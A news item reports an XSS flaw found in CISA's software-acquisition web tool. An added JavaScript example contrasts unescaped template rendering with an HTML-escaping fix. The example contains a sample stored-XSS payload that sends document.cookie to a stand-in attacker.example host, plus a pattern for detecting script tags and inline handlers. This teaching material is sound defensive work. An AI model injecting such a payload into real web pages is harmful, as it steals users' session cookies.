CISA’s secure-software buying tool had a simple XSS vulnerability of its own
A Cybersecurity and Infrastructure Security Agency (CISA) tool dedicated to helping government agencies buy secure software turned out to have a web vulnerability of its own.
Jeff Williams, the former leader of the Open Worldwide Application Security Project (OWASP), told CyberScoop that he discovered a cross-site scripting (XSS) vulnerability in CISA’s “Software Acquisition Guide: Supplier Response Web Tool” and reported it to CISA in September; it was eventually fixed in December.
The vulnerability involves attackers injecting JavaScript into a web page and then getting that JavaScript to attack other users of that same page; it also could have been used to deface the website, he said.
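The article does not disclose where in the tool the flaw lived or what the fix was, so the following is an added illustration of the general vulnerability class it describes, not CISA’s code or its patch. It shows a server-side template that concatenates a stored questionnaire answer straight into HTML, beside a hardened version that escapes every dynamic value for its HTML context. The field names (`question`, `answer`), the payload, and the `attacker.example` host are constructed for the example.

```javascript
// Added example: stored XSS via unescaped output, and the escaping fix.
// Not CISA's tool or its fix; field names and payload are constructed.

const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape a value for use as HTML text or inside a double-quoted attribute.
// Escaping is context-specific: this is NOT safe for JavaScript or URL contexts.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

// Vulnerable rendering: the submitter's stored answer becomes raw markup.
// Anything one user typed runs in the browser of every later viewer of the page.
function renderVulnerable(response) {
  return `<tr><td>${response.question}</td><td>${response.answer}</td></tr>`;
}

// Hardened rendering: every dynamic value is escaped for the HTML text context.
// The browser now shows the payload as literal text instead of executing it.
function renderHardened(response) {
  return `<tr><td>${escapeHtml(response.question)}</td><td>${escapeHtml(response.answer)}</td></tr>`;
}

// Stand-in for the browser's parser, used only to make the difference
// observable here: does the HTML contain a script element or an inline
// event handler that was not part of the template?
function containsActiveContent(html) {
  return /<script\b|\son\w+\s*=/i.test(html);
}

// Constructed sample: a stored-XSS payload submitted as a questionnaire answer.
const maliciousResponse = {
  question: 'Does the product enforce MFA?',
  answer: 'Yes<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
};

// Renders the same stored record both ways and reports which one carries
// executable content. Returns an object so the result can be checked, not just printed.
function demo(response = maliciousResponse) {
  return {
    vulnerable: containsActiveContent(renderVulnerable(response)),
    hardened: containsActiveContent(renderHardened(response)),
    hardenedHtml: renderHardened(response),
  };
}

console.log(demo());
```

Output escaping fixes the bug at the point where untrusted data meets markup; a Content-Security-Policy that disallows inline scripts is a worthwhile second layer, but it does not replace escaping, because defacement with plain HTML needs no script at all.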
Read more at CyberScoop